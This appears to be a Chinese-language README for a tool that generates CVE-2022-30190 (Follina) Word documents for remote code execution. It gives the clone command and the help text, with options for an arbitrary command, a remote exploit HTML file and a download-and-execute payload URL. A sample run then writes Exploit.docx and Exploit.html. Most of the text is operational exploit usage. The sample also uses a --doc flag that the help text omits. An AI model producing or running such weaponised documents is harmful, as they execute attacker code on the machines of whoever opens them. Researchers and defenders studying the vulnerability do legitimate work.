该脚本将尝试创建一个 Microsoft Office 文档,用于远程执行代码。
git clone https://github.com/joshuavanderpoll/CVE-2022-30190.git
cd CVE-2022-30190
python3 CVE-2022-30190.py --help
usage: CVE-2022-30190.py [-h] [--html HTML] [--cmd CMD] [--downexec]
[--download_url DOWNLOAD_URL]
生成 CVE-2022-30190 Word 文档。
可选参数:
-h, --help 显示此帮助信息并退出
--html HTML 在线漏洞利用 HTML 文件的 URL
--cmd CMD 运行时想要执行的命令
--downexec 启用下载并执行模式
--download_url DOWNLOAD_URL
下载并执行的来源地址
$ python3 CVE-2022-30190.py --doc="Original.docx" --html="http://localhost/Exploit.html" --cmd="start https://github.com/joshuavanderpoll"
[@] 正在启动 CVE-2022-30190 生成器...
[•] 由 https://github.com/joshuavanderpoll 创建
[•] 使用 Word 文档:Original.docx
[•] 正在解压 Word 文档...
[•] Word 文档已解压。
[√] 漏洞利用 Word 文档已保存至 "./builds/Exploit.docx"(1109 字节)。
[√] 漏洞利用 HTML 文件已保存至 "./builds/Exploit.html"(4241 字节)。